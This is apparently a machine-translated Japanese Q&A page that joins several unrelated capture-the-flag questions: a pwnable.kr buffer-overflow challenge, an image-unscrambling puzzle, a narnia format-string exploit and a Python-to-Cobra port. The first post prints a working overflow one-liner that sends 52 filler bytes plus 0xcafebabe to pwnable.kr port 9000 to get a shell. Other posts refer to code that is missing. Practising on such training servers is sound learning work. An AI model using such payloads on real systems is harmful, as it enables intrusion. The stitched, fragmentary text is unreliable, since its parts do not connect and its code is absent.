問題タブ [ctf]

（ダウンロードリンクなしで再度尋ねる）

問題の説明

Nana は、バッファ オーバーフローが最も一般的なソフトウェアの脆弱性の 1 つであると教えてくれました。本当？

bof.c

両方

解決

https://0xrick.github.io/pwn/bof/

バッファをオーバーフローさせるには、52 個のトラッシュ キャラクターと cafebabe を提供する必要があることを理解しています。しかし、それを入力として渡すだけでは、インタラクティブなシェルは得られません。cat コマンドも渡したときだけです。なぜ猫が必要なの??

- -編集 - -

これがサーバー上で実行されていることを忘れていたので、nc pwnable.kr 9000. として入力を渡しますpython -c 'print("A"*52 + "\xbe\xba\xfe\xca")' | nc pwnable.kr 9000。正解は(python -c 'print("A"*52 + "\xbe\xba\xfe\xca")'; cat) | nc pwnable.kr 9000

「Capture The Flag」チャレンジの一環として、添付の jpg がスクランブルされてコンテンツがわかりにくくなっています。画像 ("flagpoles.jpg") は 1600 ピクセル x 1600 ピクセルです。同心円は、幅 10 ピクセルのブロックサイズで表示されます。（フランク・ステラの絵に似ています）。元の画像が 4 つの部分に分割され、中央で対称的に配置されているように見えます。私は、ピクセルを処理し、同心円のスクランブルを解除するための python スクリプトを作成しようとしています。私の努力の結果、2 つの役に立たない状況が繰り返されました。変化がないか、スクランブルが増加しました。これは、画像全体に取り組んでいるためと思われ、その一部を解読してみる方がよいかもしれません。これが私が持っているコードです。現時点では、画像の一部を互いに一致させようとしているため、ピクセルの半分しか処理していません。ブロックを画像の反対側に送信して一致させようとしましたが、改善はありません。鮮明な画像を取得するための支援をいただければ幸いです。

やあ！私は CTF 演習 (Overthewire 5 レベル、ナルニア) に取り組んでいます。これが私が試したコードですが、2番目のオプションが機能しない理由がわかりません。

これは動作します

これで私はSegFaultを取得します

原則は両方のバリアントで同じです。アドレスを渡すと、%n 指定子は渡されたバイト数を読み取ります。アドレスは 4 バイトかかるため、パディングで 496 バイトを追加します。私が理解しているように、それらの両方で %n はスタック上の次のアドレスを読み取ります。回答ありがとうございます。

だから私はPythonでこのコードを持っていますが、数値が大きすぎてPythonが処理できないため、実行されません.Cobraのように、C ++とほぼ同じように高速に動作し、このようなタスクを処理できることがわかりました。自分でコードを書き直そうとしましたが、コンパイル エラーが発生し続け、オンライン コンパイラtio.runでコンパイルしています。

元のコードは次のとおりです。

そして、これは、インターネット上のpythonとcobraの違いに関する私の調査に基づいて書き直そうとした結果です。これはかなり貧弱です。